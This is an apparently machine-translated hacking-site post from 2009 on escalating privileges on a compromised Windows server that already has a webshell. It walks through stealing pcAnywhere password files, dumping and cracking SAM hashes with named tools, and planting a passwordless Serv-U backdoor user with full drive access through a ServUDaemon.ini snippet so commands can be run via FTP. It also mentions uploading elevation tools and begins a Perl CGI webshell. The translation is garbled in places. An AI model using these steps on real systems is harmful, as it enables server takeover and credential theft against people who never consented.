Many of the master privilege elevation techniques-vulnerability warning-the black bar safety net

2009-02-23T00:00:00
ID MYHACK58:62200922278
Type myhack58
Reporter 佚名
Modified 2009-02-23T00:00:00

Description

When we get a webshell when next you want to do is elevate privileges

Personal summary as follows:

1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere see if you can jump to this directory, if the line that is the best, and directly under it the CIF file, get the pcAnywhere password, login

  1. C:\WINNT\system32\config into here it's the SAM, crack the user's password

c:\winnt\repaire the following is the backup

With to crack sam password the software with LC, SAMinside

  1. C:\Documents and Settings\All Users\Start Menu\Programs seen here can jump No, we're from here, you can get a lot of useful information

You can see a lot of shortcuts, we generally choose Serv-U, then the local view the properties, know the path, see if you can jump

Once inside, if the permission to modify the ServUDaemon. ini, add a user up, the password is empty

[USER=dede|1]

Password=

HomeDir=c:TimeOut=6 0 0

Maintenance=System

Access1=C:\|RWAMELCDP

Access1=d:\|RWAMELCDP

Access1=f:\|RWAMELCDP

SKEYValues=

This user has the highest permissions, and then we can ftp up the quote site exec xxx to elevate permissions

  1. c:\winnt\system32\inetsrv\data is the directory, the same is erveryone full control, we have to do is put an elevated tool upload go up, and then perform the

  2. See if you can jump to the following directory

c:\php with phpspy

c:\prel sometimes is not necessarily the directory(the same can by download a shortcut to see the properties of the know)with cgi webshell

!/ usr/bin/perl

binmode(STDOUT);

syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 2 7);